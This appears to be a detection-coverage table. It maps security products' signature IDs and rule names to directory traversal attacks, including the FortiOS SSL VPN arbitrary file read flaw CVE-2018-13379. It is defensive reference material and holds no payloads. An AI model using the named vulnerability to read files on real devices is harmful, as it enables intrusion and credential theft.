Directory Traversal attempt (Content)

Forcepoint NGFW

 

HTTP_CRL-Fortinet-FortiOS-Path-Traversal-CVE-2018-13379

Forcepoint NGFW

 

HTTP_CSU-Dot-Dot-Slash-Dot-Dot-Slash-Dot-Dot-Directory-Traversal

FortiGate NGFW

48321

applications3: FortiOS.SSL.VPN.Web.Portal.Pathname.Information.Disclosure

FortiWeb Web Application Security

50180003

Generic Attacks

Imperva SecureSphere

 

Directory Traversal - 3

Imperva SecureSphere

 

Directory Traversal - 6

Imperva SecureSphere

 

Directory Traversal - 555501307

Imperva SecureSphere

 

Directory Traversal - 1

Imperva SecureSphere

 

Directory Traversal - 8

McAfee IPS

0x45274900

HTTP: FortiOS SSL VPN Arbitrary File Read Vulnerability (CVE-2018-13379)

ModSecurity

930100

Path Traversal Attack (/../)

ModSecurity

930110

Path Traversal Attack (/../)

Palo Alto Networks NGFW

30844

HTTP Directory Traversal Request Attempt

Snort IPS

5137

SERVER-WEBAPP Fortinet FortiOS SSL VPN web portal directory traversal attempt

Snort IPS

2027883

ET EXPLOIT FortiOS SSL VPN - Information Disclosure (CVE-2018-13379)

TippingPoint TPS

36087

HTTP: Fortinet FortiOS lang Directory Traversal Vulnerability